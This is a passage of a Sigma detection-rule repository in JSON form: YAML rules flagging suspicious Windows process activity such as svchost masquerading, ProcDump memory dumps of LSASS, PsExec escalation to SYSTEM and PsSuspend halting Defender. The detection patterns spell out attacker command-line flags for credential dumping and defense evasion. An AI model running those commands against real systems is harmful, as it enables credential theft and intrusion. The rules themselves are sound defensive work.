    "content": "title: WhoAmI as Parameter\nid: e9142d84-fbe0-401d-ac50-3e519fb00c89\nstatus: test\ndescription: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)\nreferences:\n    - https://twitter.com/blackarrowsec/status/1463805700602224645?s=12\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-29\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1033\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '.exe whoami'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_susp_workfolders.yml",
    "content": "title: Execution via WorkFolders.exe\nid: 0bbc6369-43e3-453d-9944-cae58821c173\nstatus: test\ndescription: Detects using WorkFolders.exe to execute an arbitrary control.exe\nreferences:\n    - https://twitter.com/elliotkillick/status/1449812843772227588\nauthor: Maxime Thiebaut (@0xThiebaut)\ndate: 2021-10-21\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\control.exe'\n        ParentImage|endswith: '\\WorkFolders.exe'\n    filter:\n        Image: 'C:\\Windows\\System32\\control.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Legitimate usage of the uncommon Windows Work Folders feature.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml",
    "content": "title: Suspect Svchost Activity\nid: 16c37b52-b141-42a5-a3ea-bbe098444397\nstatus: test\ndescription: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.\nreferences:\n    - https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2\nauthor: David Burkett, @signalblur\ndate: 2019-12-28\nmodified: 2022-06-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|endswith: 'svchost.exe'\n        Image|endswith: '\\svchost.exe'\n    filter:\n        - ParentImage|endswith:\n              - '\\rpcnet.exe'\n              - '\\rpcnetp.exe'\n        - CommandLine: null  # no CommandLine value available\n    condition: selection and not filter\nfalsepositives:\n    - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution.yml",
    "content": "title: Suspicious Process Masquerading As SvcHost.EXE\nid: be58d2e2-06c8-4f58-b666-b99f6dc3b6cd\nrelated:\n    - id: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d\n      type: similar\n    - id: e4a6b256-3e47-40fc-89d2-7a477edd6915\n      type: similar\nstatus: test\ndescription: |\n    Detects a suspicious process that is masquerading as the legitimate \"svchost.exe\" by naming its binary \"svchost.exe\" and executing from an uncommon location.\n    Adversaries often disguise their malicious binaries by naming them after legitimate system processes like \"svchost.exe\" to evade detection.\nreferences:\n    - https://tria.ge/240731-jh4crsycnb/behavioral2\n    - https://redcanary.com/blog/threat-detection/process-masquerading/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-08-07\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n    filter_main_img_location:\n        Image:\n            - 'C:\\Windows\\System32\\svchost.exe'\n            - 'C:\\Windows\\SysWOW64\\svchost.exe'\n    filter_main_ofn:\n        OriginalFileName: 'svchost.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml",
    "content": "title: Terminal Service Process Spawn\nid: 1012f107-b8f1-4271-af30-5aed2de89b39\nstatus: test\ndescription: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)\nreferences:\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-05-22\nmodified: 2023-01-25\ntags:\n    - attack.initial-access\n    - attack.t1190\n    - attack.lateral-movement\n    - attack.t1210\n    - car.2013-07-002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        ParentCommandLine|contains|all:\n            - '\\svchost.exe'\n            - 'termsvcs'\n    filter_img:\n        Image|endswith:\n            - '\\rdpclip.exe'\n            - ':\\Windows\\System32\\csrss.exe'\n            - ':\\Windows\\System32\\wininit.exe'\n            - ':\\Windows\\System32\\winlogon.exe'\n    filter_null:\n        Image: null\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_uncommon_command_line_flags.yml",
    "content": "title: Uncommon Svchost Command Line Parameter\nid: f17211f1-1f24-4d0c-829f-31e28dc93cdd\nstatus: experimental\ndescription: |\n    Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\n    This could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\nreferences:\n    - https://cardinalops.com/blog/the-art-of-anomaly-hunting-patterns-detection/\n    - https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware\n    - https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/\n    - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf\nauthor: Liran Ravich\ndate: 2025-11-14\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1036.005\n    - attack.t1055\n    - attack.t1055.012\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Example of command to simulate: \"C:\\Windows\\System32\\svchost.exe\" calc.exe\n        Image|endswith: '\\svchost.exe'\n    filter_main_flags:\n        CommandLine|re: '-k\\s\\w{1,64}(\\s?(-p|-s))?'\n    filter_main_empty:\n        CommandLine: ''\n    filter_main_null:\n        CommandLine: null\n    filter_optional_defender:\n        ParentImage|endswith: '\\MsMpEng.exe'\n        CommandLine|contains: 'svchost.exe'\n    filter_optional_mrt:\n        ParentImage|endswith: '\\MRT.exe'\n        CommandLine: 'svchost.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml",
    "content": "title: Uncommon Svchost Parent Process\nid: 01d2e2a1-5f09-44f7-9fc1-24faa7479b6d\nstatus: test\ndescription: Detects an uncommon svchost parent process\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-08-15\nmodified: 2022-06-28\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\svchost.exe'\n    filter_main_generic:\n        ParentImage|endswith:\n            - '\\Mrt.exe'\n            - '\\MsMpEng.exe'\n            - '\\ngen.exe'\n            - '\\rpcnet.exe'\n            - '\\services.exe'\n            - '\\TiWorker.exe'\n    filter_main_parent_null:\n        ParentImage: null\n    filter_main_parent_empty:\n        ParentImage:\n            - '-'\n            - ''\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml",
    "content": "title: Permission Check Via Accesschk.EXE\nid: c625d754-6a3d-4f65-9c9a-536aea960d37\nstatus: test\ndescription: Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43\n    - https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW\n    - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat\n    - https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-10-13\nmodified: 2023-02-20\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_img:\n        - Product|endswith: 'AccessChk'\n        - Description|contains: 'Reports effective permissions'\n        - Image|endswith:\n              - '\\accesschk.exe'\n              - '\\accesschk64.exe'\n        - OriginalFileName: 'accesschk.exe'\n    selection_cli:\n        CommandLine|contains: # These are the most common flags used with this tool. You could add other combinations if needed\n            - 'uwcqv '\n            - 'kwsu '\n            - 'qwsu '\n            - 'uwdqs '\n    condition: all of selection*\nfalsepositives:\n    - System administrator Usage\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml",
    "content": "title: Active Directory Database Snapshot Via ADExplorer\nid: 9212f354-7775-4e28-9c9f-8f0a4544e664\nrelated:\n    - id: ef61af62-bc74-4f58-b49b-626448227652\n      type: derived\nstatus: test\ndescription: Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.\nreferences:\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\n    - https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer\n    - https://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24\n    - https://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/\n    - https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/\n    - https://trustedsec.com/blog/adexplorer-on-engagements\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\nmodified: 2025-07-09\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1069.002\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\ADExp.exe'\n              - '\\ADExplorer.exe'\n              - '\\ADExplorer64.exe'\n              - '\\ADExplorer64a.exe'\n        - OriginalFileName: 'AdExp'\n        - Description: 'Active Directory Editor'\n        - Product: 'Sysinternals ADExplorer'\n    selection_cli:\n        CommandLine|contains: 'snapshot'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml",
    "content": "title: Suspicious Active Directory Database Snapshot Via ADExplorer\nid: ef61af62-bc74-4f58-b49b-626448227652\nrelated:\n    - id: 9212f354-7775-4e28-9c9f-8f0a4544e664\n      type: derived\nstatus: test\ndescription: Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory. This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.\nreferences:\n    - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html\n    - https://learn.microsoft.com/de-de/sysinternals/downloads/adexplorer\n    - https://github.com/c3c/ADExplorerSnapshot.py/tree/f700904defac330802bbfedd1d8ffd9248f4ee24\n    - https://www.packetlabs.net/posts/scattered-spider-is-a-young-ransomware-gang-exploiting-large-corporations/\n    - https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/\n    - https://trustedsec.com/blog/adexplorer-on-engagements\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-14\nmodified: 2025-07-09\ntags:\n    - attack.discovery\n    - attack.t1087.002\n    - attack.t1069.002\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\ADExp.exe'\n              - '\\ADExplorer.exe'\n              - '\\ADExplorer64.exe'\n              - '\\ADExplorer64a.exe'\n        - OriginalFileName: 'AdExp'\n        - Description: 'Active Directory Editor'\n        - Product: 'Sysinternals ADExplorer'\n    selection_flag:\n        CommandLine|contains: 'snapshot'\n    selection_paths:\n        CommandLine|contains:\n            # TODO: Add more suspicious paths\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - '\\AppData\\'\n            - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_eula_accepted.yml",
    "content": "title: Potential Execution of Sysinternals Tools\nid: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b\nrelated:\n    - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133\n      type: derived\nstatus: test\ndescription: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools\nreferences:\n    - https://twitter.com/Moti_B/status/1008587936735035392\nauthor: Markus Neis\ndate: 2017-08-28\nmodified: 2024-03-13\ntags:\n    - attack.resource-development\n    - attack.t1588.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|windash: ' -accepteula'\n    condition: selection\nfalsepositives:\n    - Legitimate use of SysInternals tools\n    - Programs that use the same command line flag\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_livekd_execution.yml",
    "content": "title: Potential Memory Dumping Activity Via LiveKD\nid: a85f7765-698a-4088-afa0-ecfbf8d01fa4\nstatus: test\ndescription: Detects execution of LiveKD based on PE metadata or image name\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/livekd\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-15\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith:\n              - '\\livekd.exe'\n              - '\\livekd64.exe'\n        - OriginalFileName: 'livekd.exe'\n    condition: selection\nfalsepositives:\n    - Administration and debugging activity (must be investigated)\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml",
    "content": "title: Kernel Memory Dump Via LiveKD\nid: c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2\nstatus: test\ndescription: Detects execution of LiveKD with the \"-m\" flag to potentially dump the kernel memory\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/livekd\n    - https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/\n    - https://kb.acronis.com/content/60892\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-16\nmodified: 2024-03-13\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\livekd.exe'\n              - '\\livekd64.exe'\n        - OriginalFileName: 'livekd.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' -m'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely in production environment\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml",
    "content": "title: Procdump Execution\nid: 2e65275c-8288-4ab4-aeb7-6274f58b6b20\nstatus: test\ndescription: Detects usage of the SysInternals Procdump utility\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-16\nmodified: 2023-02-28\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\procdump.exe'\n            - '\\procdump64.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of procdump by a developer or administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml",
    "content": "title: Potential SysInternals ProcDump Evasion\nid: 79b06761-465f-4f88-9ef2-150e24d3d737\nstatus: test\ndescription: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name\nreferences:\n    - https://twitter.com/mrd0x/status/1480785527901204481\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-11\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains:\n            - 'copy procdump'\n            - 'move procdump'\n    selection_2:\n        CommandLine|contains|all:\n            - 'copy '\n            - '.dmp '\n        CommandLine|contains:\n            - '2.dmp'\n            - 'lsass'\n            - 'out.dmp'\n    selection_3:\n        CommandLine|contains:\n            - 'copy lsass.exe_'  # procdump default pattern e.g. lsass.exe_220111_085234.dmp\n            - 'move lsass.exe_'  # procdump default pattern e.g. lsass.exe_220111_085234.dmp\n    condition: 1 of selection_*\nfalsepositives:\n    - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml",
    "content": "title: Potential LSASS Process Dump Via Procdump\nid: 5afee48e-67dd-4e03-a783-f74259dcf998\nstatus: stable\ndescription: |\n    Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.\n    This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.\n    LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.\n    Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump\n    - https://research.splunk.com/endpoint/3742ebfe-64c2-11eb-ae93-0242ac130002\n    - https://x.com/wietze/status/1958302556033065292?s=12\nauthor: Florian Roth (Nextron Systems)\ndate: 2018-10-30\nmodified: 2025-10-19\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.credential-access\n    - attack.t1003.001\n    - car.2013-05-009\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_flags:\n        CommandLine|contains|windash:\n            - ' -ma '\n            - ' -mm ' # Mini dump\n            - ' -mp ' # Miniplus dump\n    selection_process:\n        CommandLine|contains:\n            - ' ls' # Short for lsass\n            - ' keyiso'\n            - ' samss'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely, because no one should dump an lsass process memory\n    - Another tool that uses command line flags similar to ProcDump\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_execution.yml",
    "content": "title: Psexec Execution\nid: 730fc21b-eaff-474b-ad23-90fd265d4988\nstatus: test\ndescription: Detects user accept agreement execution in psexec commandline\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: omkar72\ndate: 2020-10-30\nmodified: 2023-02-28\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1569\n    - attack.t1021\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\psexec.exe'\n        - OriginalFileName: 'psexec.c'\n    condition: selection\nfalsepositives:\n    - Administrative scripts.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml",
    "content": "title: PsExec/PAExec Escalation to LOCAL SYSTEM\nid: 8834e2f7-6b4b-4f09-8906-d2276470ee23\nrelated:\n    - id: 207b0396-3689-42d9-8399-4222658efc99 # Generic rule based on similar cli flags\n      type: similar\nstatus: test\ndescription: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.poweradmin.com/paexec/\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-11-23\nmodified: 2024-03-05\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_sys: # Escalation to LOCAL_SYSTEM\n        CommandLine|contains|windash:\n            # Note that you don't need to add the \".exe\" part when using psexec/paexec\n            # The \"-\" can also be replaced with \"/\"\n            # The order of args isn't important\n            # \"cmd\" can be replaced by \"powershell\", \"pwsh\" or any other console like software\n            - ' -s cmd'\n            - ' -s -i cmd'\n            - ' -i -s cmd'\n            # Pwsh (For PowerShell 7)\n            - ' -s pwsh'\n            - ' -s -i pwsh'\n            - ' -i -s pwsh'\n            # PowerShell (For PowerShell 5)\n            - ' -s powershell'\n            - ' -s -i powershell'\n            - ' -i -s powershell'\n    selection_other:\n        CommandLine|contains:\n            - 'psexec'\n            - 'paexec'\n            - 'accepteula'\n    condition: all of selection_*\nfalsepositives:\n    - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)\n    - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml",
    "content": "title: Potential PsExec Remote Execution\nid: ea011323-7045-460b-b2d7-0f7442ea6b38\nstatus: test\ndescription: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.poweradmin.com/paexec/\n    - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-28\nmodified: 2025-09-01\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        # Accepting EULA in commandline - often used in automated attacks\n        CommandLine|contains|all:\n            - 'accepteula'\n            - ' -u '\n            - ' -p '\n            - ' \\\\\\\\'\n    filter_main_localhost:\n        CommandLine|contains:\n            - '\\\\\\\\localhost'\n            - '\\\\\\\\127.'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml",
    "content": "title: PsExec Service Execution\nid: fdfcbd78-48f1-4a4b-90ac-d82241e368c5\nrelated:\n    - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba\n      type: obsolete\nstatus: test\ndescription: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\n    - https://www.youtube.com/watch?v=ro2QuZTIMBM\nauthor: Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)\ndate: 2017-06-12\nmodified: 2023-02-28\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image: 'C:\\Windows\\PSEXESVC.exe'\n        - OriginalFileName: 'psexesvc.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative tasks\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml",
    "content": "title: PsExec Service Child Process Execution as LOCAL SYSTEM\nid: 7c0dcd3d-acf8-4f71-9570-f448b0034f94\nrelated:\n    - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba\n      type: similar\nstatus: test\ndescription: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-21\nmodified: 2023-02-28\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage: 'C:\\Windows\\PSEXESVC.exe'\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection\nfalsepositives:\n    - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psloglist.yml",
    "content": "title: Suspicious Use of PsLogList\nid: aae1243f-d8af-40d8-ab20-33fc6d0c55bc\nstatus: test\ndescription: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs\nreferences:\n    - https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/\n    - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList\n    - https://twitter.com/EricaZelic/status/1614075109827874817\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-18\nmodified: 2024-03-05\ntags:\n    - attack.discovery\n    - attack.t1087\n    - attack.t1087.001\n    - attack.t1087.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'psloglist.exe'\n        - Image|endswith:\n              - '\\psloglist.exe'\n              - '\\psloglist64.exe'\n    selection_cli_eventlog:\n        CommandLine|contains:\n            - ' security'\n            - ' application'\n            - ' system'\n    selection_cli_flags:\n        CommandLine|contains|windash:\n            - ' -d'\n            - ' -x'\n            - ' -s'\n            - ' -c' # Clear event log after displaying\n            - ' -g' # Export an event log as an evt file.\n    condition: all of selection_*\nfalsepositives:\n    - Another tool that uses the command line switches of PsLogList\n    - Legitimate use of PsLogList by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml",
    "content": "title: Sysinternals PsService Execution\nid: 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f\nstatus: test\ndescription: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/psservice\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-16\nmodified: 2023-02-24\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'psservice.exe'\n        - Image|endswith:\n              - '\\PsService.exe'\n              - '\\PsService64.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of PsService by an administrator\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml",
    "content": "title: Sysinternals PsSuspend Execution\nid: 48bbc537-b652-4b4e-bd1d-281172df448f\nrelated:\n    - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78\n      type: similar\nstatus: test\ndescription: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend\n    - https://twitter.com/0gtweet/status/1638069413717975046\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-23\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.persistence\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'pssuspend.exe'\n        - Image|endswith:\n              - '\\pssuspend.exe'\n              - '\\pssuspend64.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml",
    "content": "title: Sysinternals PsSuspend Suspicious Execution\nid: 4beb6ae0-f85b-41e2-8f18-8668abc8af78\nrelated:\n    - id: 48bbc537-b652-4b4e-bd1d-281172df448f # Basic Execution\n      type: similar\nstatus: test\ndescription: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses\nreferences:\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend\n    - https://twitter.com/0gtweet/status/1638069413717975046\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'pssuspend.exe'\n        - Image|endswith:\n              - '\\pssuspend.exe'\n              - '\\pssuspend64.exe'\n    selection_cli:\n        # Add more interesting/critical processes\n        CommandLine|contains: 'msmpeng.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_sysinternals_sdelete.yml",
